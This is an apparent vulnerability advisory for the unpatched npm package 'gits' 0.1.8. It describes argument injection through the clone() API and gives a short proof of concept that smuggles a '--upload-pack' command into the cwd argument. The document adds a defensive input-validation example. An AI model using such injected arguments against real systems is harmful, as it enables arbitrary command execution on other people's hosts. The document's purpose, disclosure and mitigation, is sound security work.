
Argument Injection vulnerability in `gits@0.1.8`

An Argument Injection vulnerability was discovered in the `gits` npm package that could allow attackers to execute arbitrary commands on the host.

The `gits` npm package describes itself as "Local promise-returning git command wrappers for Node.js". An issue opened on the GitHub repository to contact the maintainer received no response, and the vulnerability remains unpatched.


Background on exploitation

I’m reporting an Argument Injection vulnerability in the `gits` npm package.

This vulnerability manifests in the library’s `clone(dir, repo, branch, cwd)` API, which lets the caller specify the branch, repo, and other metadata. When any of that input to the function is controlled by the user, it may cause a command injection.

Exploit

  1. Install gits@0.1.8 or earlier
  2. Create the empty directory /tmp/balloon to hold the repository to clone to
  3. Establish the following POC:

```js
var gits = require("gits");
gits.clone(
  "/tmp/balloon",
  "file:///tmp/none",
  "master",
  "--upload-pack=touch /tmp/abcd"
);
```

  4. Observe new file created on disk at /tmp/abcd
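One way a wrapper can keep caller-supplied values from being parsed as git options, as an added example that is not code from the `gits` package or from the original report. The function names `assertNotOption`, `buildCloneArgs` and `safeClone` are hypothetical, and the example assumes git is run through `execFile` with an argv array rather than a shell string.

```javascript
// Hypothetical helper names; this is not code from the gits package.
// Reject any value that git could parse as an option, or that carries control characters.
function assertNotOption(name, value) {
  if (typeof value !== "string" || value.length === 0) {
    throw new TypeError(`${name} must be a non-empty string`);
  }
  if (value.startsWith("-")) {
    throw new Error(`${name} must not start with "-": ${JSON.stringify(value)}`);
  }
  if (/[\0\r\n]/.test(value)) {
    throw new Error(`${name} contains control characters`);
  }
}

// Build the argv for `git clone` so that user input can only ever be a value.
function buildCloneArgs(repo, dir, branch) {
  assertNotOption("repo", repo);
  assertNotOption("dir", dir);
  const args = ["clone"];
  if (branch !== undefined) {
    assertNotOption("branch", branch);
    // Bind the value to the option so it is never a separate token.
    args.push(`--branch=${branch}`);
  }
  // "--" ends option parsing: everything after it is positional.
  args.push("--", repo, dir);
  return args;
}

// Run the clone without a shell; cwd goes to the process options, not to git's argv.
function safeClone(repo, dir, branch, cwd) {
  // Loaded only when a clone is actually run.
  const { execFile } = require("node:child_process");
  return new Promise((resolve, reject) => {
    execFile("git", buildCloneArgs(repo, dir, branch), { cwd }, (err, stdout, stderr) =>
      err ? reject(err) : resolve({ stdout, stderr })
    );
  });
}
```

With these checks the option string from the PoC is rejected before git is started, whichever parameter it is passed in.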
